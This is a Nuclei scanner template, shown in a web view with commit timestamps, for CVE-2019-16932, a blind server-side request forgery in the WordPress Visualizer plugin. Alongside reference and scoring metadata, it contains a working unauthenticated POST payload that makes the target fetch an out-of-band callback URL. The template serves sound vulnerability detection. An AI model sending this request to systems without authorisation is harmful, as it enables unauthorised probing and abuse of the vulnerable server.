nuclei-templates/http/cves/2019/CVE-2019-16932.yaml

56 lines
1.5 KiB
YAML
Raw Normal View History

2022-05-10 20:17:40 +00:00
id: CVE-2019-16932
info:
name: Visualizer <3.3.1 - Blind Server-Side Request Forgery
2022-05-10 20:17:40 +00:00
author: akincibor
severity: critical
2022-05-10 20:17:40 +00:00
description: |
Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
2022-05-10 20:17:40 +00:00
reference:
- https://wpscan.com/vulnerability/9892
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
- https://nvd.nist.gov/vuln/detail/CVE-2019-16932
- https://wordpress.org/plugins/visualizer/#developers
2023-07-11 19:49:27 +00:00
- https://wpvulndb.com/vulnerabilities/9892
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cvss-score: 10
cve-id: CVE-2019-16932
cwe-id: CWE-918
2023-07-11 19:49:27 +00:00
epss-score: 0.53434
cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.97161
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: themeisle
product: visualizer
tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive
2022-05-10 20:17:40 +00:00
http:
2022-05-10 20:17:40 +00:00
- method: POST
path:
2023-07-11 19:49:27 +00:00
- "{{BaseURL}}/wp-json/visualizer/v1/upload-data"
2022-05-12 14:21:26 +00:00
2022-05-23 11:54:34 +00:00
body: '{\"url\":\"http://{{interactsh-url}}\"}'
2022-05-10 20:17:40 +00:00
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
2022-05-23 11:54:34 +00:00
- type: word
name: http
2023-07-11 19:49:27 +00:00
part: interactsh_protocol
2022-05-23 11:54:34 +00:00
words:
2023-07-11 19:49:27 +00:00
- http
2022-05-23 11:56:35 +00:00
2022-05-23 11:54:34 +00:00
- type: word
part: header
words:
2023-07-11 19:49:27 +00:00
- application/json
2022-05-23 11:54:34 +00:00
2022-05-10 20:17:40 +00:00
- type: status
status:
- 200